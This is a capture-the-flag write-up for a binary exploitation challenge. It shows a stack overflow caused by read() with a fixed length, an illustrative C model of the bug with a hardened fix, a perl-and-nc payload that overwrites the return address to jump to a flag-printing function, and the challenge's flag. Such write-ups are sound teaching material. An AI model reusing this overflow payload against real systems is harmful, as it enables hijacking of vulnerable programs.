Points: 75

Tags: binary-exploitation 

Sample Program Output:

What's your name?
Testing Name
It's dangerous to go alone! Take this, Testing Name

         █   
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
      ███████
      █ ███ █
        ███  
        ███  
        ███  


The program asks the user for a name, and then displays a message and a sword.

The message is built on the stack with a sequence of movabs/mov instructions that store the string eight bytes at a time:

  401210:   48 b8 49 74 27 73 20    movabs rax,0x6e61642073277449
  401217:   64 61 6e 
  40121a:   48 ba 67 65 72 6f 75    movabs rdx,0x742073756f726567
  401221:   73 20 74 
  401224:   48 89 85 f0 fd ff ff    mov    QWORD PTR [rbp-0x210],rax
  40122b:   48 89 95 f8 fd ff ff    mov    QWORD PTR [rbp-0x208],rdx
  401232:   48 b8 6f 20 67 6f 20    movabs rax,0x6f6c61206f67206f
  401239:   61 6c 6f 
  40123c:   48 ba 6e 65 21 20 54    movabs rdx,0x656b61542021656e
  401243:   61 6b 65 
  401246:   48 89 85 00 fe ff ff    mov    QWORD PTR [rbp-0x200],rax
  40124d:   48 89 95 08 fe ff ff    mov    QWORD PTR [rbp-0x1f8],rdx
  401254:   48 b8 20 74 68 69 73    movabs rax,0x202c7369687420
  40125b:   2c 20 00 
  40125e:   ba 00 00 00 00          mov    edx,0x0
  401263:   48 89 85 10 fe ff ff    mov    QWORD PTR [rbp-0x1f0],rax
  40126a:   48 89 95 18 fe ff ff    mov    QWORD PTR [rbp-0x1e8],rdx

It then appends the user's name to that message, reading it with the read function:

  40129c:   48 8d 85 f0 fd ff ff    lea    rax,[rbp-0x210]
  4012a3:   48 89 c7                mov    rdi,rax
  4012a6:   e8 f5 fd ff ff          call   4010a0 <strlen@plt>
  4012ab:   48 8d 95 f0 fd ff ff    lea    rdx,[rbp-0x210]
  4012b2:   48 01 d0                add    rax,rdx
  4012b5:   ba 00 02 00 00          mov    edx,0x200
  4012ba:   48 89 c6                mov    rsi,rax
  4012bd:   bf 00 00 00 00          mov    edi,0x0
  4012c2:   e8 f9 fd ff ff          call   4010c0 <read@plt>

The problem is that read is told to write at the end of the existing string, i.e. at rbp - 0x210 + strlen("It's dangerous..."), but its length argument is still a fixed 0x200 bytes rather than the space that remains in the buffer. Since the buffer only spans 0x210 bytes below rbp, an input of the full length runs past its end and over the saved rbp and the return address.
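The following C model is an added illustration of that bug and is not the challenge's own code. It lays out main's frame as the disassembly shows it (a 0x210-byte buffer directly below the saved rbp and the return address), reproduces the append logic (a read of up to 0x200 bytes at buf + strlen(buf)) next to a hardened variant whose cap is derived from the remaining room, and reports what each does to the return-address slot. The sentinel values for saved rbp and the return address, the 'a'-filled name and the fake_read stand-in for read(2) are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE     0x210        /* the challenge's buffer lives at [rbp-0x210] */
#define READ_LEN     0x200        /* the constant length the challenge passes to read() */
#define RET_SENTINEL 0x401200ULL  /* constructed stand-in for the real return address */

static const char GREETING[] = "It's dangerous to go alone! Take this, ";

/* Model of main's stack frame as laid out in the disassembly: the buffer sits
 * directly below the saved rbp and the return address. Writing past buf[] stays
 * inside this one struct, so we can inspect what an overrun clobbers. */
struct frame {
    char     buf[BUF_SIZE];
    uint64_t saved_rbp;
    uint64_t ret;
    char     slack[64];           /* absorbs whatever spills beyond ret */
};

/* Stand-in for read(2) over a constructed input: copies min(len, max) bytes and
 * returns the count. Like the syscall, it cannot know how big dst really is. */
static size_t fake_read(char *dst, const char *input, size_t len, size_t max) {
    size_t n = len < max ? len : max;
    memcpy(dst, input, n);
    return n;
}

/* The challenge's logic: append at buf + strlen(buf) with a fixed cap of 0x200,
 * which ignores how much of buf is actually left. */
size_t vulnerable_append(struct frame *f, const char *input, size_t len) {
    size_t used = strlen(f->buf);
    char *dst = (char *)f + offsetof(struct frame, buf) + used;
    return fake_read(dst, input, len, READ_LEN);
}

/* Hardened variant: the cap is the room that remains, minus one byte for the
 * terminator, so the write can never reach saved_rbp or ret. */
size_t safe_append(struct frame *f, const char *input, size_t len) {
    size_t used = strlen(f->buf);
    if (used >= sizeof f->buf - 1)
        return 0;                              /* buffer full: drop the input */
    size_t room = sizeof f->buf - 1 - used;
    size_t n = fake_read(f->buf + used, input, len, room);
    f->buf[used + n] = '\0';                   /* read() never terminates; we must */
    return n;
}

static void init_frame(struct frame *f) {
    memset(f, 0, sizeof *f);
    strcpy(f->buf, GREETING);
    f->saved_rbp = 0x7ffd00000000ULL;          /* constructed sentinel */
    f->ret       = RET_SENTINEL;
}

/* Feeds a name of `len` 'a' bytes (capped at READ_LEN, the most read() would
 * return) to one variant on a fresh frame and returns the return-address slot. */
uint64_t ret_after(int hardened, size_t len) {
    static char name[READ_LEN];
    struct frame f;
    if (len > sizeof name)
        len = sizeof name;
    memset(name, 'a', sizeof name);
    init_frame(&f);
    if (hardened)
        safe_append(&f, name, len);
    else
        vulnerable_append(&f, name, len);
    return f.ret;
}

/* Length of the string the hardened variant leaves in buf (always terminated). */
size_t safe_len_after(size_t len) {
    static char name[READ_LEN];
    struct frame f;
    if (len > sizeof name)
        len = sizeof name;
    memset(name, 'a', sizeof name);
    init_frame(&f);
    safe_append(&f, name, len);
    return strlen(f.buf);
}

int main(void) {
    size_t lens[] = { 32, 489, 497, READ_LEN };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("name of %3zu bytes: vulnerable ret=0x%016llx  safe ret=0x%016llx\n",
               lens[i], (unsigned long long)ret_after(0, lens[i]),
               (unsigned long long)ret_after(1, lens[i]));
    return 0;
}
```

With the greeting occupying 39 bytes, a name of 489 bytes ends exactly at the top of the buffer, 497 bytes cover the saved rbp, and a full 0x200-byte read replaces the return address with 'a' bytes in the vulnerable variant only; the hardened variant stops at 527 bytes and always leaves a terminated string.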

There are neither stack canaries nor ASLR, and right after the main function there is a function that opens a file named flag.txt and prints it out:

  40130d: c3                    ret         
  40130e: f3 0f 1e fa           endbr64 
  401312: 55                    push   rbp 
  401313: 48 89 e5              mov    rbp,rsp
  401316: 48 81 ec 10 02 00 00  sub    rsp,0x210
  40131d: be 00 00 00 00        mov    esi,0x0
  401322: 48 8d 3d 16 0f 00 00  lea    rdi,[rip+0xf16]        # 40223f <open@plt+0x115f>
  401329: b8 00 00 00 00        mov    eax,0x0
  40132e: e8 ad fd ff ff        call   4010e0 <open@plt>
  401333: 89 45 fc              mov    DWORD PTR [rbp-0x4],eax
  401336: 48 8d 8d f0 fd ff ff  lea    rcx,[rbp-0x210]
  40133d: 8b 45 fc              mov    eax,DWORD PTR [rbp-0x4]
  401340: ba 00 02 00 00        mov    edx,0x200
  401345: 48 89 ce              mov    rsi,rcx
  401348: 89 c7                 mov    edi,eax
  40134a: e8 71 fd ff ff        call   4010c0 <read@plt>
  40134f: 8b 45 fc              mov    eax,DWORD PTR [rbp-0x4]
  401352: 89 c7                 mov    edi,eax
  401354: e8 57 fd ff ff        call   4010b0 <close@plt>
  401359: 48 8d 85 f0 fd ff ff  lea    rax,[rbp-0x210]
  401360: 48 89 c7              mov    rdi,rax
  401363: e8 28 fd ff ff        call   401090 <puts@plt>
  401368: 90                    nop
  401369: c9                    leave
  40136a: c3                    ret

So just changing the return address to 0x401313 works.

Solution:

  perl -e 'printf("a"x497 . "\x13\x13\x40" . "\x00"x10);' | nc jh2i.com 50011

Output:

  flag{legend_of_zelda_overflow_of_time}

Writeups

  Author team      Rating
  Deadlock Team    not rated
  burner_herz0g    not rated
  Hack South       2.0